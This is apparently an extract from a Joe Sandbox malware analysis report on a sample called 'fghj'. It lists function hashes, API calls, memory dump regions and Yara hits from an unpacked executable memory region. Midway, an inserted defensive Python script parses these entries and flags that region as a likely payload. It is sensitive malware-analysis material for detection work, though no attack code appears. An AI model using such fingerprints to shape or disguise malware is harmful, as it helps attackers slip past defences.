• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 5caf35f11ff5a4da511b8600435fd25165698c50024feaac6e25f8899c592db4
• Instruction ID: 461d1662f7f1cafe1f9e9af2a2f710b5ecf2f5b9f35e15414d02e38254ed8bc2
• Opcode Fuzzy Hash: 5caf35f11ff5a4da511b8600435fd25165698c50024feaac6e25f8899c592db4
• Instruction Fuzzy Hash: 9B121337D103218FD74BEF79EC8A55A37AAFB93314B46862EE442C71A5DB3854028B81
APIs
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 2dd3bd388136ed9c084dc6e8cad1395e3c729a25d1ae64dadd773a22b8ea6f2d
• Instruction ID: 1af4ac5b837667d9de3e7eee40bf08fb2ad358bb8af4e23db65704b7843f8614
• Opcode Fuzzy Hash: 2dd3bd388136ed9c084dc6e8cad1395e3c729a25d1ae64dadd773a22b8ea6f2d
• Instruction Fuzzy Hash: B1F10437D103218FC74FEF79EC8A55A376AFB93305B46862EE442CB1A9DB3851018B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: f
• API String ID: 0-1993550816
• Opcode ID: 09a8b75ec536dbca7a7376d9415b1fd9020d3604bca0648bee68539fa425c826
• Instruction ID: c9b6b50da4022de2e995725848d8e910a1f5f3868df451db10b842235cc8a147
• Opcode Fuzzy Hash: 09a8b75ec536dbca7a7376d9415b1fd9020d3604bca0648bee68539fa425c826
• Instruction Fuzzy Hash: 5A12D0746083418FD714CF28C891F2BBBE1EBD9314F258AACE6959729ADB31DC05CB52
APIs
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 0f1267a10b9dc5051697d67a66cb74a7e24b6d12e3d24b42ceb52d7a4fa268f1
• Instruction ID: c5f457c344514f3085040aa981c607f29a420899929dd62ab4738249b7dbe574
• Opcode Fuzzy Hash: 0f1267a10b9dc5051697d67a66cb74a7e24b6d12e3d24b42ceb52d7a4fa268f1
• Instruction Fuzzy Hash: 9CE11377D103218FC74FEF79EC9A65A376AFB93301B46862EE452C71A9DB3851018B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: SRST
• API String ID: 0-1783897844
• Opcode ID: 0456384825ea4fa961126b819c69e5e2ee748957ec08dcab38542764cb961c65
• Instruction ID: 620a9c050cfb4fbdf62476f1e9bfc611912eaa2968f0d00345a98174b6e37010
• Opcode Fuzzy Hash: 0456384825ea4fa961126b819c69e5e2ee748957ec08dcab38542764cb961c65
• Instruction Fuzzy Hash: 46B15872F083254FD7288E24D89167BB7E2EBD5314F29867DE8969B381DA34DC0587C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: -
• API String ID: 0-2547889144
• Opcode ID: d0bdbfe23a4422e5c95eb81cae082a1d78068452bb9f91bbc8e8c257de933646
• Instruction ID: cbe32550e4d6ee9ba3522a5a5dcd5099b5c37c609dc1cb6982ee95b951a7e96b
• Opcode Fuzzy Hash: d0bdbfe23a4422e5c95eb81cae082a1d78068452bb9f91bbc8e8c257de933646
• Instruction Fuzzy Hash: 10D1DB71A087454BC719CE29D8D026ABFE2EBC1320F18CB6DE5E5473D6D7389D498B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: B>
• API String ID: 0-1123492563
• Opcode ID: 784bd9279c87542a1bfe3a596d208e75cbe64a15f8c9e4cc0859b87d9ee11ca1
• Instruction ID: 6dc871d76c9898b3d9936e9d5229de3683e5adcfdce14e683c072566ea5f4d1d
• Opcode Fuzzy Hash: 784bd9279c87542a1bfe3a596d208e75cbe64a15f8c9e4cc0859b87d9ee11ca1
• Instruction Fuzzy Hash: 549104729083148BC724DF28C8916A7B3E1EF95324F09C56DEC998B391FB789945CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: 7aa613b8427eb4ff8c6086c07544124af6a7eb668be6b9012f478a0f7f7bfeb7
• Instruction ID: d297d39325044b741e11fb7f2b617c7ead070d814176ecac48382816f1552ec5
• Opcode Fuzzy Hash: 7aa613b8427eb4ff8c6086c07544124af6a7eb668be6b9012f478a0f7f7bfeb7
• Instruction Fuzzy Hash: 4BC1E37550C3508BD325CF68848126FBFE2EFD2314F188AACE8D59B381D775C9098B9A
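Added example, not Joe Sandbox code and not part of the original report: a small Python triage script over function boxes like the ones listed above. It picks out the two facts a practitioner wants from this section: the boxes carrying "Yara matches" come from an anonymous region at 0x00B00000 that is not PE-backed ("based on PE: false"), which is the usual shape of an unpacked stealer payload, while the many GetModuleHandleW boxes at ref 003A7A1F from the mapped image have instruction fuzzy hashes that differ in only a handful of positions. Two assumptions are this example's own: the dotted .sdmp file name is read as `proc.phase.unique.base.protect.state.type.n.sdmp` because the values line up with winnt.h constants (0x20 PAGE_EXECUTE_READ on the .text mapping, 0x40 PAGE_EXECUTE_READWRITE and 0x20000 MEM_PRIVATE on the 0xB00000 region, 0x1000000 MEM_IMAGE on the image), but the page does not document that layout; and `nibble_similarity` is a simple positional hex-digit comparison, not Joe Sandbox's own Similarity metric. The report text embedded below is constructed from the entries above with the long Opcode/Instruction ID lines dropped.

```python
import re
from itertools import combinations

# winnt.h constants used to interpret the (ASSUMED) .sdmp name fields.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# Constructed sample: three function boxes copied from the listing above,
# trimmed to the lines this script reads.
REPORT = """\
APIs
GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
Instruction Fuzzy Hash: 9B121337D103218FD74BEF79EC8A55A37AAFB93314B46862EE442C71A5DB3854028B81
APIs
GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
Instruction Fuzzy Hash: B1F10437D103218FC74FEF79EC8A55A376AFB93305B46862EE442CB1A9DB3851018B81
Strings
Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Yara matches
Instruction Fuzzy Hash: 5A12D0746083418FD714CF28C891F2BBBE1EBD9314F258AACE6959729ADB31DC05CB52
"""

SOURCE_RE = re.compile(
    r"Source File: (?P<name>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)")


def parse_dump_name(name):
    """ASSUMED field order: proc.phase.unique.base.protect.state.type.n.sdmp.
    Only base address, page protection and memory type are used here."""
    f = name[: -len(".sdmp")].split(".")
    return {"base": int(f[3], 16), "protect": int(f[4], 16), "type": int(f[6], 16)}


def parse_entries(text):
    """Split the report text into one dict per function box."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):          # a box starts with its section kind
            cur = {"kind": line, "apis": [], "yara": False, "fuzzy": None}
            entries.append(cur)
        elif cur is None:
            continue
        elif ", ref: " in line:                   # "Api.MODULE(args), ref: addr"
            call, ref = line.rsplit(", ref: ", 1)
            cur["apis"].append((call.split("(", 1)[0], int(ref, 16)))
        elif (m := SOURCE_RE.match(line)):
            cur["dump"] = parse_dump_name(m["name"])
            cur["offset"] = int(m["off"], 16)
            cur["pe_backed"] = m["pe"] == "true"
        elif line == "Yara matches":
            cur["yara"] = True
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur["fuzzy"] = line.split(":", 1)[1].strip()
    return entries


def unpacked_regions(entries):
    """Base addresses of regions that look like an in-memory unpacked payload:
    anonymous (MEM_PRIVATE), RWX, not a PE mapping, and carrying Yara hits."""
    hits = []
    for e in entries:
        d = e["dump"]
        if (d["type"] == MEM_PRIVATE and d["protect"] == PAGE_EXECUTE_READWRITE
                and not e["pe_backed"] and e["yara"] and d["base"] not in hits):
            hits.append(d["base"])
    return hits


def nibble_similarity(a, b):
    """Share of equal hex digits at equal positions. A deliberately simple
    heuristic of this example, NOT Joe Sandbox's own Similarity metric."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def near_duplicate_functions(entries, threshold=0.7):
    """Index pairs of boxes that call the same APIs from the same ref address
    and whose instruction fuzzy hashes agree above the threshold."""
    pairs = []
    for i, j in combinations(range(len(entries)), 2):
        a, b = entries[i], entries[j]
        if a["apis"] and a["apis"] == b["apis"] \
                and nibble_similarity(a["fuzzy"], b["fuzzy"]) >= threshold:
            pairs.append((i, j))
    return pairs


if __name__ == "__main__":
    ents = parse_entries(REPORT)
    print("candidate unpacked regions:", [hex(b) for b in unpacked_regions(ents)])
    print("near-duplicate function pairs:", near_duplicate_functions(ents))
```

On the entries above this flags 0xB00000 as the only candidate payload region and pairs the two GetModuleHandleW boxes, which is the region to dump and the function family to deduplicate before spending analyst time on the listing.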
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2?#2
                                                                                                                                                                                                                    • API String ID: 0-573533050
                                                                                                                                                                                                                    • Opcode ID: 35661873d35cf4f8716ac815e441bee8707f6a5940d0966b78fa6e68816bc911
                                                                                                                                                                                                                    • Instruction ID: 4ecf60513b44854932d0be6511e3bb29c99c3ae1e1ad43fe707cf94a5984de06
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35661873d35cf4f8716ac815e441bee8707f6a5940d0966b78fa6e68816bc911
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9B1E47050C3E18BD7358F2994607ABBFE1EF97304F1889ADD4D99B292CB754806CB52
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "7
                                                                                                                                                                                                                    • API String ID: 0-1591144912
                                                                                                                                                                                                                    • Opcode ID: 1c620da236318be6c2630bccc2c73e716dbec5fb3ea60899035f1b99130df550
                                                                                                                                                                                                                    • Instruction ID: 1d12859b492e73210026b588e8665df400df38f76a3fff6760d152fdb83cee92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c620da236318be6c2630bccc2c73e716dbec5fb3ea60899035f1b99130df550
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B127726483814BD7358A24CC827EBBBD2EFDA314F184A7CD0C997783E6798416870A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2?#2
                                                                                                                                                                                                                    • API String ID: 0-573533050
                                                                                                                                                                                                                    • Opcode ID: e1ae8dd32569bb6ed73e9b0d11a6dc1ba8be50b83cf2a1552b047df8e7522eff
                                                                                                                                                                                                                    • Instruction ID: 2b5593d1ad6a247b92ca56e83fcf9ef2283c919ed398d0f5baef78990560bbf5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1ae8dd32569bb6ed73e9b0d11a6dc1ba8be50b83cf2a1552b047df8e7522eff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A1D27050C3A18BD735CF29946076BBFE1EF97300F1889ADE4D99B282DB758906CB52
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(00000000,00000010,00000000,00000000), ref: 003A6DE0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SystemTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2656138-0
                                                                                                                                                                                                                    • Opcode ID: 8c1dd643816c4b178a56dd0f45c03f7e640c63b387e8a3be1b499e8a49f6bf31
                                                                                                                                                                                                                    • Instruction ID: dbded27e82974a60cbbc9ca07b1b6e0f40f009262fdb65c1b16fa04cd394b21a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c1dd643816c4b178a56dd0f45c03f7e640c63b387e8a3be1b499e8a49f6bf31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 512142C5B5022076D91A33AA9C1FF7F65BDDBCBF51F00050DB642AF1C1E9A58D4082B5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 003A284A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                    • Opcode ID: 6f147222d5ddcde98198f3beec317373b86f6c5061cb5b0d0c15afc62dddff9d
                                                                                                                                                                                                                    • Instruction ID: 684b23763a149e01efc6432bc059b0cea531c0102e7de4cde1e071ec53f343f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f147222d5ddcde98198f3beec317373b86f6c5061cb5b0d0c15afc62dddff9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3119131A001149FEF26EFA8D8486AF77A9EB4B314F11042CF822DB255D738C9058B51
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                    • API String ID: 0-3772416878
                                                                                                                                                                                                                    • Opcode ID: 73a97fa2b6a4a6e99ae617ad845b61d5978ed26f2d8680854e54ae8cfa838b4f
                                                                                                                                                                                                                    • Instruction ID: 755cc0e21b5cf084229bff860c625713accdd69d7a39d5dcceda0bc853008cb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73a97fa2b6a4a6e99ae617ad845b61d5978ed26f2d8680854e54ae8cfa838b4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6B1297160C3819FC325CF18C88061BFFE0AFA9704F544A6DE5D997782D671EA18CB96
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                    • Opcode ID: e423654f8c610dc644856f6f37982c56c4aaf75068658c8a4316112f8d6504dd
                                                                                                                                                                                                                    • Instruction ID: 46dc26167c2891a5f79de0f8a919f9a4401c9846e6d17c403bd62b1ed1dd39fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e423654f8c610dc644856f6f37982c56c4aaf75068658c8a4316112f8d6504dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF9135329042614FDB21CE28C8802AABBD1EB95364F19C2BCECB99B3D1D635DC46D7D1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -/
                                                                                                                                                                                                                    • API String ID: 0-3427678492
                                                                                                                                                                                                                    • Opcode ID: 5923bc72aa036b37dcc9b6ec911afa69f79a2454b70ee41baba6469da8460f3a
                                                                                                                                                                                                                    • Instruction ID: 1e4f06abc2600cf272ffb8b5315f3bd5fce9b3db344586b7bb377c9bf0049366
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5923bc72aa036b37dcc9b6ec911afa69f79a2454b70ee41baba6469da8460f3a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B391ACB1A002049FDB18DF69D99259ABFB1FF45300B5982AED845AF306D731C542CFD6
                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9efcf0838a6fd8f65fc209291e397d515af630530fca5bcca238ec0a87b5523a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7132E4B1604B408FD714DF38C4853AABBE2AF85310F59897DD4EB873D2E634A945CB12
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f3ebc0f5c8dbbd7e571ff7d473589349e0bb2da46d055cf5f220d4e1d461fdda
                                                                                                                                                                                                                    • Instruction ID: 9f8ad84530fc5b37e29a6f4c15a6369ced932027bd3b4183d66dc54b7936ad00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ebc0f5c8dbbd7e571ff7d473589349e0bb2da46d055cf5f220d4e1d461fdda
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5112C5316087118BC724DF58D8817ABB7E2FFC5305F29897DD986972C2E734A916CB42
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 537b44b4c95565246e60379fb249d812d4d58a7e5d082b732558218ba1ea2e3b
                                                                                                                                                                                                                    • Instruction ID: b550a3d98699fd01329bd7d0cbca9913cbd72a398050ab5acc6cf97e5fdad9b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 537b44b4c95565246e60379fb249d812d4d58a7e5d082b732558218ba1ea2e3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C132F070915B108FC378CE29C59056BBBF2BF55710BA04A6ED6A78BE90D736B844CF14
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5cdce912ae16fa7c2910c67f319d47321224ac57559afeb0f8abb2cd8482bd88
                                                                                                                                                                                                                    • Instruction ID: 9258412f9b698077c1b9b0b50c9a7556147db6e2dc96ae16a7fecb0936f13903
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cdce912ae16fa7c2910c67f319d47321224ac57559afeb0f8abb2cd8482bd88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96129032D10518EFCB19CF68C5945ACBBB2EF85346F2585AAD856AB280D7309F81DF81
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5cf219bfe2d8594f18ad05bd877f8147c62a1e8db656438c57afbb6f7846bcc5
                                                                                                                                                                                                                    • Instruction ID: 4c746d3c880212b53720c8c31ca59398dd341cc9893011a15fd183b75ea89d97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf219bfe2d8594f18ad05bd877f8147c62a1e8db656438c57afbb6f7846bcc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D11872A083218BD714CF24C881A6BB7E2EBC5714F7989ACF5856B295DF31AC05C7D2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7226f1894162a06b9b1387c3496a955569d99e600cb79f6b4c702f34ddccb085
                                                                                                                                                                                                                    • Instruction ID: c6e868f6945d4b92c28bf4b43908449ab4bbfad747b4cb7e2841ff2bc20652b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7226f1894162a06b9b1387c3496a955569d99e600cb79f6b4c702f34ddccb085
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82F1AA356487418FC724CF29C880A6BFBE6EFD9300F08896DE5D987791E675E844CB92
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
